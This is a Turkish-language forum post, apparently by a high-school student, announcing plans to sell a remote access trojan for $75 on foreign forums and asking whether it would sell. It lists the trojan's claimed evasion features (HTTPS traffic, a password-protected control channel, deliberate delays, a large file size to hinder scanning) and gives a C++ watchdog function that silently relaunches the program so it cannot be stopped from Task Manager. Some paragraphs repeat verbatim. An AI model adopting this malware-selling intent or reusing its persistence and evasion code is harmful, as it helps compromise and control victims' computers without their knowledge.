Arkadaşlar benim paraya ihtiyacım var öyle yüksek mevlalar değil bir lise öğrencisine yetecek kadar, siber güvenlik alanında bilgim olsada yetersiz bir bilgi bende RAT satarak para kazanmayı düşünüyorum TABİ RAT HENÜZ HAZIR DEĞİL bu RAT tamamen algılanamaz bir özeliğe sahip tamamen HTTPS iletişimi kurarak zararlı trafik algılama yöntemlerini atllata biliyor en iyi özeliği görev yöneticisinden bile bu RAT'ı durduramazsınız nasıl oluyor anlatıcağım.
RAT'ın diğer özeliği ise IP adresi olmadan kurban makine ile saldırgan makine arası bağlantı kura biliyor bunu özel bir kanal ile yapıyor başka biri bu kanala erişim sağlasa bile güvenlik parolasını girmediği sürece hiç bir işlem yapamıyor yine bu kanala ister telefondan ister bilgisayardan ister tabletten bağlanıp güvenlik parolasını girip kurban makineyi istediğiniz her yerden kontrol ede bilirsiniz ama malesef dezavantajları da var öncelikle her RAT 60 ila 45 MB arası bir boyuta sahip bu onu taraması zor creck lenmesi neredeyse imkansız ve şüpe çekmez yapıyor şüpe çekmemesinin sebebi normal virüslerin boyutu bir kaç kb dir bu ise 45 MB diğer dezavantajı her kurban makine için ayrı bir kanal oluşturulmalı 1 kanal yanlızca 1 makineye hizmet verir ( BU SORUNU DÜZIYORUM ) RAT şüpe çekmemek için bilinçli olarak biraz yavaş hareket ediyor kod gönderdikten sonra 2 ila 4 saniyelik bir gecikme yaşanıyor ve çıktı öyle gönderiliyor bunun sebebi programın kod çalıştırma yöntemi.
Gelelim bu kod kendisini görev yöneticisinden nasıl koruyor cevap watchdog mekanizması, aşağıdaki c++ koduna bakın
arkadaşlar ben bu RATı 75 dolardan yabancı forumlarda satışa sunmayı düşünüyorum sizce satılırmı lütfen fikirlerinizi paylaşın
RAT'ın diğer özeliği ise IP adresi olmadan kurban makine ile saldırgan makine arası bağlantı kura biliyor bunu özel bir kanal ile yapıyor başka biri bu kanala erişim sağlasa bile güvenlik parolasını girmediği sürece hiç bir işlem yapamıyor yine bu kanala ister telefondan ister bilgisayardan ister tabletten bağlanıp güvenlik parolasını girip kurban makineyi istediğiniz her yerden kontrol ede bilirsiniz ama malesef dezavantajları da var öncelikle her RAT 60 ila 45 MB arası bir boyuta sahip bu onu taraması zor creck lenmesi neredeyse imkansız ve şüpe çekmez yapıyor şüpe çekmemesinin sebebi normal virüslerin boyutu bir kaç kb dir bu ise 45 MB diğer dezavantajı her kurban makine için ayrı bir kanal oluşturulmalı 1 kanal yanlızca 1 makineye hizmet verir ( BU SORUNU DÜZIYORUM ) RAT şüpe çekmemek için bilinçli olarak biraz yavaş hareket ediyor kod gönderdikten sonra 2 ila 4 saniyelik bir gecikme yaşanıyor ve çıktı öyle gönderiliyor bunun sebebi programın kod çalıştırma yöntemi.
Gelelim bu kod kendisini görev yöneticisinden nasıl koruyor cevap watchdog mekanizması, aşağıdaki c++ koduna bakın
C++:
/* UYARI!!!
Arkadaşlar ben sadece işin mantığını göstermek için bu kodu paylaşıyorum eğer kendi
projelerinizde kulanacaksanız bu komuta bir kontrol mekanizması ekleyin yoksa aynı programı
tekrar tekrar açarak sistemi RAMı ve CPU yu aşrı yükleyerek sistemi önce durdurur sonra
çökertir*/
void LaunchWatchdog() {
STARTUPINFOA si = {0};
PROCESS_INFORMATION pi = {0};
si.cb = sizeof(si);
si.wShowWindow = SW_HIDE;
char cmdLine[MAX_PATH];
GetModuleFileNameA(NULL, cmdLine, MAX_PATH);
strcat_s(cmdLine, " -watchdog");
CreateProcessA(
NULL, cmdLine, NULL, NULL, FALSE,
CREATE_NO_WINDOW, NULL, NULL, &si, &pi
);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
arkadaşlar ben bu RATı 75 dolardan yabancı forumlarda satışa sunmayı düşünüyorum sizce satılırmı lütfen fikirlerinizi paylaşın

